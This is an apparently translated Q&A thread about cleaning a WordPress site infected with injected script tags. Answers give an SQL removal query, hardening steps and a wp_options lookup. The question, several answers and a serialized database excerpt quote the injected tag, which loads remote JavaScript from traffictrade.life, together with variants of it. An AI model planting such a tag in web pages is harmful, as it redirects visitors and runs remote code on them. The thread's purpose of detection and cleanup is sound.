【问题标题】:Wordpress site infected with malware感染了恶意软件的 Wordpress 网站
【发布时间】:2017-07-17 15:33:17
【问题描述】:

我公司几年前建立的一个 wordpress 网站看起来感染了恶意软件。我们应该怎么做才能从站点中过滤掉恶意软件并防止这种情况再次发生?任何建议都非常感谢。

看起来到处都嵌入了图像文件,嵌入了这段代码:

<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>

谢谢

【问题讨论】:

  • 使用Wordfence 扫描您的主题和插件目录中的恶意代码。此外,请检查您的 .htaccess 文件的内容和权限,因为该文件通常在对 Wordpress 的攻击中被修改。

标签: wordpress spam malware virus


【解决方案1】:

几天前出现了一个恶意软件。它也影响了我的一个旧客户网站。

它几乎影响了网站的所有帖子和页面。

如果您查看数据库的 wp_posts 表中所有条目的 post_content,您会看到有这个新的脚本标签

<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>

如果为了轻松删除此恶意软件,请使用此查询

UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>', '') WHERE INSTR(post_content, '<script src=\'https://traffictrade.life/scripts.js\' type=\'text/javascript\'></script>') > 0;

如果您使用的是缓存插件,请确保清除缓存。

希望有帮助

【讨论】:

  • 我也插入了这个脚本。对于上下文,我正在运行 Tagdiv v2.1 的主题 NewsMag,并且 coe 被插入到主题定制的“主题面板”的“标题广告”部分。让我担心的是,每一两天代码都会在这里重新插入,即使我手动进入并删除它。同时我也重置了所有密码并升级了WordPress本身,重定向广告代码不断重现。
【解决方案2】:

实际上,我的 100 多个 WordPress 网站都遇到过这个问题。我对所有网站实施了以下安全措施

  • 删除非活动插件
  • 删除非活动主题
  • 更新 WP 本身
  • 更新所有活动插件
  • 重新定位 wp-config.php 并在实际 wp_config.php 中包含路径
  • 添加 WP-hide 登录,以便根据用户的意愿将 wp-admin 更改为。
  • 添加限制登录尝试以限制尝试次数。
  • 将插件文件夹移动到根目录并重命名。还将 /wp-content/ 的所有精度替换到整个数据库中的新位置。
  • 将 wp-content 目录名称更改为其他并将 /wp-content/ 的所有精度替换为整个数据库中的新位置。

请使用此工具进行搜索和替换,因为_options表中可能存在序列化形式的值 https://interconnectit.com/products/search-and-replace-for-wordpress-databases/

以下可能存在此恶意软件

<script src='\''https://traffictrade.life/scripts.js'\'' type='\''text/javascript'\''></script>

<script src="https://traffictrade.life/scripts.js" type="text/javascript"></script>

<script src="https://traffictrade.life/scripts.js" type="mce-mce-mce-text/javascript"></script>

<script src="https://traffictrade.life/scripts.js" type="mce-mce-text/javascript"></script>

<script src="https://traffictrade.life/scripts.js" type="mce-text/javascript"></script>

希望这会有所帮助。

【讨论】:

【解决方案3】:

我知道这个线程已经很老了,但就像上面的其中一个 cmets 一样,我在选项表中找到了注入。

在做任何事情之前备份你的数据库!

SELECT * FROM wp_options WHERE option_value LIKE '%traffictrade%'

这会给你带来一组结果,注入的脚本是序列化格式的。

;s:22:"tds_logo_menu_upload_r";s:0:"";s:22:"tds_footer_logo_upload";s:0:"";s:29:"tds_footer_retina_logo_upload";s:0:"";s:25:"tds_site_background_image";s:60:"http://www.domain.co.uk/wp-content/uploads/2016/05/BG.png";s:6:"td_ads";a:8:{s:6:"header";a:6:{s:7:"ad_code";s:87:"<script src='https://traffictrade.life/scripts.js' type='text/javascript'></script>";s:9:"disable_m";s:0:"";s:10:"disable_tl";s:0:"";s:10:"disable_tp";s:0:"";s:9:"disable_p";s:0:"";

请注意代码中的traffictrade.life/scripts.js 引用(为了安全起见,已从网站中删除脚本标签)

从包含它的任何结果中删除脚本并保存,这会阻止我的网站被重定向。

【讨论】:

    猜你喜欢
    • 2018-06-16
    • 1970-01-01
    • 2018-10-14
    • 2020-06-06
    • 2015-11-02
    • 2023-03-05
    • 2019-01-10
    • 1970-01-01
    • 2017-08-29
    相关资源
    最近更新 更多